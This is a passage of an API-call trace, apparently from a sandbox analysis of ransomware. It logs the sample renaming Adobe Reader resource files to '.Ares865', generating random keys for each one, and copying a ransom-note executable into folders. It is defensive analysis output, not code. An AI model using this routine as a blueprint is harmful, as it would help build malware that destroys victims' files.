10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt.ares865"), dwFlags=0x1) returned 1 [0155.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.472] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23875) returned 1 [0155.473] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.473] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.473] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.476] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.477] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.477] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.478] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="ICELAND.TXT" | out: lpString1="ICELAND.TXT") returned="ICELAND.TXT" [0155.478] lstrlenW (lpString="ICELAND.TXT") returned 11 [0155.478] lstrlenW (lpString="Ares865") returned 7 [0155.478] lstrcmpiW (lpString1="AND.TXT", lpString2="Ares865") returned -1 [0155.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT.Ares865") returned 102 [0155.478] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt.ares865"), dwFlags=0x1) returned 1 [0155.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.480] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14204) returned 1 [0155.481] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.481] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.481] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.484] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.485] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.485] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.486] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="JAPANESE.TXT" | out: lpString1="JAPANESE.TXT") returned="JAPANESE.TXT" [0155.486] lstrlenW (lpString="JAPANESE.TXT") returned 12 [0155.486] lstrlenW (lpString="Ares865") returned 7 [0155.486] lstrcmpiW (lpString1="ESE.TXT", lpString2="Ares865") returned 1 [0155.486] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT.Ares865") returned 103 [0155.486] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt.ares865"), dwFlags=0x1) returned 1 [0155.488] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.488] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=205020) returned 1 [0155.488] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.489] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.489] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.499] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.500] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.500] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.503] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="KOREAN.TXT" | out: lpString1="KOREAN.TXT") returned="KOREAN.TXT" [0155.503] lstrlenW (lpString="KOREAN.TXT") returned 10 [0155.503] lstrlenW (lpString="Ares865") returned 7 [0155.503] lstrcmpiW (lpString1="EAN.TXT", lpString2="Ares865") returned 1 [0155.504] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT.Ares865") returned 101 [0155.504] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt.ares865"), dwFlags=0x1) returned 1 [0155.506] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.506] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=365007) returned 1 [0155.506] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.507] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.507] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.554] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.555] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.555] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.560] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="ROMAN.TXT" | out: lpString1="ROMAN.TXT") returned="ROMAN.TXT" [0155.560] lstrlenW (lpString="ROMAN.TXT") returned 9 [0155.560] lstrlenW (lpString="Ares865") returned 7 [0155.560] lstrcmpiW (lpString1="MAN.TXT", lpString2="Ares865") returned 1 [0155.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT.Ares865") returned 100 [0155.561] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt.ares865"), dwFlags=0x1) returned 1 [0155.568] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.568] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14423) returned 1 [0155.569] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.569] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.569] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.571] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.572] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.572] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.573] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="ROMANIAN.TXT" | out: lpString1="ROMANIAN.TXT") returned="ROMANIAN.TXT" [0155.573] lstrlenW (lpString="ROMANIAN.TXT") returned 12 [0155.573] lstrlenW (lpString="Ares865") returned 7 [0155.573] lstrcmpiW (lpString1="IAN.TXT", lpString2="Ares865") returned 1 [0155.573] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT.Ares865") returned 103 [0155.573] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt.ares865"), dwFlags=0x1) returned 1 [0155.575] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.575] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14792) returned 1 [0155.575] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.576] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.576] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.579] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.579] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.579] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.580] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="SYMBOL.TXT" | out: lpString1="SYMBOL.TXT") returned="SYMBOL.TXT" [0155.580] lstrlenW (lpString="SYMBOL.TXT") returned 10 [0155.580] lstrlenW (lpString="Ares865") returned 7 [0155.580] lstrcmpiW (lpString1="BOL.TXT", lpString2="Ares865") returned 1 [0155.581] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT.Ares865") returned 101 [0155.581] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt.ares865"), dwFlags=0x1) returned 1 [0155.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.582] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15731) returned 1 [0155.583] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.583] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.583] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.588] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.588] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.588] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.589] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="THAI.TXT" | out: lpString1="THAI.TXT") returned="THAI.TXT" [0155.589] lstrlenW (lpString="THAI.TXT") returned 8 [0155.589] lstrlenW (lpString="Ares865") returned 7 [0155.589] lstrcmpiW (lpString1="HAI.TXT", lpString2="Ares865") returned 1 [0155.590] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT.Ares865") returned 99 [0155.590] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt.ares865"), dwFlags=0x1) returned 1 [0155.591] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.592] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15301) returned 1 [0155.592] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.593] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.593] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.595] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.596] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.596] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.597] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="TURKISH.TXT" | out: lpString1="TURKISH.TXT") returned="TURKISH.TXT" [0155.597] lstrlenW (lpString="TURKISH.TXT") returned 11 [0155.597] lstrlenW (lpString="Ares865") returned 7 [0155.597] lstrcmpiW (lpString1="ISH.TXT", lpString2="Ares865") returned 1 [0155.597] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT.Ares865") returned 102 [0155.597] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt.ares865"), dwFlags=0x1) returned 1 [0155.599] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.599] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12825) returned 1 [0155.599] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.600] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.600] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.603] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.604] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.604] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.605] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="UKRAINE.TXT" | out: lpString1="UKRAINE.TXT") returned="UKRAINE.TXT" [0155.605] lstrlenW (lpString="UKRAINE.TXT") returned 11 [0155.605] lstrlenW (lpString="Ares865") returned 7 [0155.605] lstrcmpiW (lpString1="INE.TXT", lpString2="Ares865") returned 1 [0155.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT.Ares865") returned 102 [0155.605] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt.ares865"), dwFlags=0x1) returned 1 [0155.607] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.607] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4634) returned 1 [0155.607] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.608] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.608] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.611] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.612] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.612] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.613] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe" [0155.613] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe" [0155.613] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.613] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.614] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.615] GetLastError () returned 0x0 [0155.615] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.615] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834450e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5405a340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5405a340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.615] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.615] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.615] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="HKSCS.txt" | out: lpString1="HKSCS.txt") returned="HKSCS.txt" [0155.615] lstrlenW (lpString="HKSCS.txt") returned 9 [0155.615] lstrlenW (lpString="Ares865") returned 7 [0155.615] lstrcmpiW (lpString1="SCS.txt", lpString2="Ares865") returned 1 [0155.616] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: 